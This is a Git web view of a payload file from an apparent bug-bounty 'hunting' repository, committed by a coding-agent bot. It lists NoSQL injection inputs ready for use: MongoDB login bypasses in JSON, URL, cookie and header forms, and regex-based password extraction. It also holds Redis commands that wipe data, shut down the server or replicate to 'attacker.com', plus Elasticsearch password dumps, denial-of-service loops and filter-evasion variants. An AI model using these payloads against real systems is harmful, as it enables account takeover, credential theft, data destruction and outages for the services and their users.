0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 19:36:33 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
ce0e810e001894c3c5422c3bda594017b5ccb9d6
hunting/NoSQL-Injection/nosql-injection-payloads.txt
T
copilot-swe-agent[bot] 0a48c19312 Add NoSQL, CSV, File Upload vulnerabilities and enhance Command Injection 
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
2026-01-04 19:45:07 +00:00

324 lines
9.1 KiB
Plaintext
Raw Blame History

# NoSQL Injection Payloads (2020-2025 Bug Bounty Tested)
# ============================
# MongoDB Injection Payloads
# ============================
# Authentication Bypass - JSON Format
{"username": {"$ne": null}, "password": {"$ne": null}}
{"username": {"$ne": ""}, "password": {"$ne": ""}}
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}
{"username": "admin", "password": {"$ne": ""}}
{"username": "admin", "password": {"$gt": ""}}
{"username": {"$in": ["admin", "administrator", "root"]}, "password": {"$ne": ""}}
# Authentication Bypass - URL Encoded
username[$ne]=null&password[$ne]=null
username[$ne]=&password[$ne]=
username[$gt]=&password[$gt]=
username[$regex]=.*&password[$regex]=.*
username=admin&password[$ne]=
username=admin&password[$gt]=
username[$nin][]=&password[$ne]=
username[$exists]=true&password[$exists]=true
# MongoDB Operators Injection
{"$where": "sleep(5000)"}
{"$where": "this.password == 'admin'"}
{"username": {"$regex": "^admin"}}
{"username": {"$regex": "admin.*"}}
{"email": {"$regex": ".*@domain\\.com$"}}
{"role": {"$in": ["admin", "superuser"]}}
{"age": {"$gt": 0}}
{"price": {"$lt": 9999}}
{"status": {"$ne": "inactive"}}
{"verified": {"$eq": true}}
# Time-Based NoSQL Injection (MongoDB)
{"$where": "sleep(5000) || true"}
{"username": {"$regex": "^a"}, "$where": "sleep(5000)"}
';sleep(5000);'
';return true;var x='
{"username": "admin", "$where": "sleep(5000)"}
# Data Extraction - MongoDB
{"username": {"$regex": "^a"}}
{"username": {"$regex": "^ad"}}
{"username": {"$regex": "^adm"}}
{"username": {"$regex": "^admi"}}
{"username": {"$regex": "^admin"}}
{"password": {"$regex": "^[a-z]"}}
{"apiKey": {"$regex": "^.*"}}
# Boolean-Based MongoDB Injection
{"username": "admin", "password": {"$ne": "wrong"}}
{"$or": [{"username": "admin"}, {"email": "admin@test.com"}]}
{"$and": [{"username": {"$exists": true}}, {"password": {"$exists": true}}]}
{"$nor": [{"banned": true}, {"deleted": true}]}
# MongoDB Command Injection
{"username": "admin", "$comment": "test"}
{"username": "admin", "$hint": "username_1"}
{"$orderby": {"username": 1}}
{"username": {"$type": 2}}
{"username": {"$size": 5}}
# MongoDB Operator Abuse
{"username": {"$all": ["admin"]}}
{"roles": {"$elemMatch": {"role": "admin"}}}
{"metadata": {"$exists": false}}
{"settings": {"$nin": ["disabled"]}}
# Advanced MongoDB Injection (2023-2025)
{"username": {"$expr": {"$eq": ["$username", "admin"]}}}
{"$expr": {"$gt": [{"$strLenCP": "$password"}, 0]}}
{"username": {"$jsonSchema": {}}}
{"username": "admin'; return true; var a='"}
{"username": "admin\"; return true; var a=\""}
# ============================
# CouchDB Injection Payloads
# ============================
# CouchDB View Manipulation
startkey="admin"&endkey="admin\ufff0"
startkey=["admin"]&endkey=["admin", {}]
key="admin"
keys=["admin","root","administrator"]
# CouchDB Query Injection
{"selector": {"username": {"$eq": "admin"}}}
{"selector": {"$or": [{"username": "admin"}, {"role": "admin"}]}}
{"selector": {"password": {"$gt": null}}}
{"selector": {"_id": {"$gte": null}}}
# CouchDB Mango Query Injection
{"selector": {"$and": [{"username": {"$exists": true}}, {"password": {"$exists": true}}]}}
{"selector": {"username": {"$regex": "(?i)admin"}}}
{"selector": {"email": {"$regex": ".*@.*"}}}
# ============================
# Redis Injection Payloads
# ============================
# Redis Command Injection
\n\r\nSET key value\r\n
\n\r\nFLUSHALL\r\n
\n\r\nGET password\r\n
\n\r\nKEYS *\r\n
\n\r\nCONFIG GET *\r\n
\n\r\nCONFIG SET dir /var/www/html\r\n
\n\r\nSAVE\r\n
\n\r\nSHUTDOWN\r\n
\n\r\nSLAVEOF attacker.com 6379\r\n
# Redis Protocol Injection
*1\r\n$8\r\nFLUSHALL\r\n
*1\r\n$4\r\nKEYS\r\n$1\r\n*\r\n
*2\r\n$3\r\nGET\r\n$3\r\nkey\r\n
*3\r\n$3\r\nSET\r\n$4\r\ntest\r\n$5\r\nvalue\r\n
# Redis Lua Injection
EVAL "return redis.call('GET', 'password')" 0
EVAL "return redis.call('KEYS', '*')" 0
EVAL "redis.call('SET', 'hacked', 'true')" 0
# ============================
# Cassandra Injection Payloads
# ============================
# Cassandra CQL Injection
' OR '1'='1
admin' --
admin' /*
' ALLOW FILTERING --
' AND token(id) > token(' union select * from users --')
# ============================
# Elasticsearch Injection
# ============================
# Elasticsearch Query Injection
{"query": {"match_all": {}}}
{"query": {"wildcard": {"username": "*"}}}
{"query": {"regexp": {"password": ".*"}}}
{"query": {"prefix": {"apikey": ""}}}
{"query": {"bool": {"must_not": {"term": {"role": "guest"}}}}}
# Elasticsearch Script Injection (Groovy/Painless)
{"script": {"source": "doc['password'].value"}}
{"query": {"script_score": {"query": {"match_all": {}}, "script": {"source": "Math.random()"}}}}
# Elasticsearch Aggregation Injection
{"aggs": {"passwords": {"terms": {"field": "password", "size": 1000}}}}
{"aggs": {"users": {"terms": {"field": "username.keyword"}}}}
# ============================
# Generic NoSQL Injection
# ============================
# Array Injection
username[]=admin&password[]=password
username[$gt]=&password[$gt]=
{"username": ["$ne", null], "password": ["$ne", null]}
# Type Confusion
username=admin&password=true
username=admin&password=1
{"username": "admin", "password": true}
{"username": "admin", "password": 1}
# Null Byte Injection
admin%00
admin\x00
{"username": "admin\u0000"}
# Comment Injection
admin' // comment
admin' /* comment */
{"username": "admin' // ", "password": "pass"}
# Encoding Bypasses
{"username": {"$ne": "\u0000"}}
{"username": {"$regex": "\x2e\x2a"}}
# ============================
# Authentication Bypass Combinations (High Success Rate 2020-2025)
# ============================
# JSON POST Body
{"username": "admin", "password": {"$ne": null}}
{"username": {"$in": ["admin", "administrator"]}, "password": {"$exists": true}}
{"$or": [{"username": "admin"}, {"username": "administrator"}], "password": {"$gt": ""}}
{"username": "admin", "password": {"$regex": "^.*"}}
# URL Parameters
?username[$ne]=fake&password[$ne]=fake
?username=admin&password[$gt]=
?username[$regex]=admin&password[$ne]=fake
?username[$in][]=admin&password[$exists]=true
# Cookie Values
username=admin; password[$ne]=fake
session={"username":{"$ne":null},"password":{"$ne":null}}
# HTTP Headers
X-Username: admin
X-Password: {"$ne": ""}
Authorization: {"username": {"$ne": null}}
# ============================
# Advanced Data Extraction Techniques
# ============================
# Character-by-Character Extraction
{"username": {"$regex": "^a.*"}}
{"username": {"$regex": "^ad.*"}}
{"username": {"$regex": "^adm.*"}}
# Length-Based Extraction
{"password": {"$regex": "^.{8}$"}}
{"password": {"$regex": "^.{1,100}$"}}
# Character Set Testing
{"password": {"$regex": "^[a-z].*"}}
{"password": {"$regex": "^[A-Z].*"}}
{"password": {"$regex": "^[0-9].*"}}
# ============================
# Blind NoSQL Injection
# ============================
# Time-Based
{"$where": "sleep(5000)"}
{"$where": "this.username == 'admin' && sleep(5000)"}
{"username": "admin", "$where": "sleep(5000) || true"}
# Boolean-Based
{"username": "admin", "password": {"$regex": "^a"}}
{"username": "admin", "password": {"$regex": "^b"}}
# ============================
# NoSQL Injection Payloads for APIs
# ============================
# GraphQL-style NoSQL Injection
{"filter": {"username": {"$ne": null}}}
{"where": {"password": {"$exists": true}}}
{"match": {"role": "admin"}}
# REST API Query Parameters
?filter[username][$ne]=fake
?where[password][$exists]=true
?sort[role][$eq]=admin
# ============================
# Polyglot NoSQL Injection
# ============================
' || '1'=='1' || {"$ne":""}
admin' || true || {"$ne": null}
{"$ne": null} || '1'='1
# ============================
# Denial of Service (DoS) Payloads
# ============================
{"$where": "while(true){}"}
{"$where": "for(var i=0;i<99999999;i++){}"}
{"username": {"$regex": "^((((((((((a+)+)+)+)+)+)+)+)+)+)$"}}
# ============================
# Modern Framework-Specific Injections (2023-2025)
# ============================
# Express.js/Node.js
req.body.username[$ne]=null
req.query.password[$gt]=
req.cookies.user[$exists]=true
# Django MongoDB
{"username__ne": null, "password__ne": null}
{"username__regex": "admin"}
{"password__exists": True}
# PHP MongoDB
array("username" => array('$ne' => null))
array("password" => array('$gt' => ""))
# Python (PyMongo)
{"username": {"$ne": None}, "password": {"$ne": None}}
{"username": {"$regex": ".*admin.*", "$options": "i"}}
# ============================
# WAF/Filter Bypass Techniques
# ============================
# Unicode Bypass
{"username": {"$\u006Ee": null}}
{"username": {"\u0024ne": null}}
# Case Variation
{"username": {"$Ne": null}}
{"username": {"$NE": null}}
# Spacing/Formatting
{"username":{"$ne":null}}
{ "username" : { "$ne" : null } }
{"username" : {"$ne" : null}}
# Property Pollution
{"__proto__": {"admin": true}}
{"constructor": {"prototype": {"admin": true}}}
# ============================
# Server-Side JavaScript Injection (SSJI)
# ============================
'; return true; var dummy='
"; return true; var dummy="
'; var ret = this; return ret; var dummy='
{"$where": "function() { return true; }"}
{"$where": "obj.credits - obj.price > 0"}
Reference in New Issue View Git Blame Copy Permalink